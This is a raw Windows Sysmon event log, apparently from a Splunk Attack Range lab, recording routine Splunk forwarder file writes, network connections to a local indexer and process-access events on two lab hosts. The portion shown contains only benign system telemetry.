07:51:30.245{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA4DE021208E17E00128E9B06F3B4ADA,SHA256=B9E9D57D92BD82319C054035ABA251A45B09FA3990D63860027646C6568F8C11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103682Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:31.969{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C40A00B2B974649A72CBE7C74A74729A,SHA256=54E71685CB57E2B47F3E9C8841C40F5F523285AB694E8B7FC298CA3578830267,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081522Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:29.188{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50038-false10.0.1.12-8089- 10341000x800000000000000081521Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:31.495{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B283-615A-4901-00000000FD01}3800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081520Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:31.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081519Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:31.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081518Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:31.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081517Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:31.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081516Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:31.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081515Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:31.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081514Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:31.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081513Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:31.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081512Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:31.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081511Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:31.495{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B283-615A-4901-00000000FD01}3800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081510Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:31.495{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B283-615A-4901-00000000FD01}3800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081509Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:31.496{2FDD8D40-B283-615A-4901-00000000FD01}3800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081508Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:31.245{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEAA040C44E5A7B297DCE2D339B4B5B4,SHA256=3A8AA1578A58CB47B343C13BAE1E029B6485EE7FA15A0ABD8CC4E8E01393347C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103685Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:32.969{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCFE330A2CE439776EE93483E477461F,SHA256=350B08B0BA32D89BFD7E9E083E74787A76BF401006AD66B335793A2ACDD5FBDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081539Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.495{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81A9D9841FDEA32596CC4799DE416160,SHA256=51F054D4F90FB7E3253AEFF687785E9C6A350828C330EFAD9CC5E53A8EB90696,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081538Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.495{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5BDD8B47AA9B4F5C692E1D556953BDF2,SHA256=2D9C9640A007AB0B4213813991EDD5EF9BB42275F2D1ECBF493DCE479FF7527A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081537Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.448{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13D3B40E9E2C79C8EF88D43CB1CC628D,SHA256=421DC5ED78BAB25DDDA31515EA0FD21B14B3298DBB8CF7868481641957D6D21D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081536Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.323{2FDD8D40-B284-615A-4A01-00000000FD01}14001416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000103684Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:31.329{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49535-false10.0.1.12-8000- 23542300x8000000000000000103683Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:32.032{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=9D8F09E033D99A67C38DDEF908F0C591,SHA256=A6F8F6AC50B64A3260513C258769C2606CE3BB86C2048FBBF09BDF4D72F8BA6E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081535Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.167{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B284-615A-4A01-00000000FD01}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081534Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.167{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081533Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.167{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081532Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.167{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081531Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.167{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081530Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.167{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081529Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:32.167{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081528Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 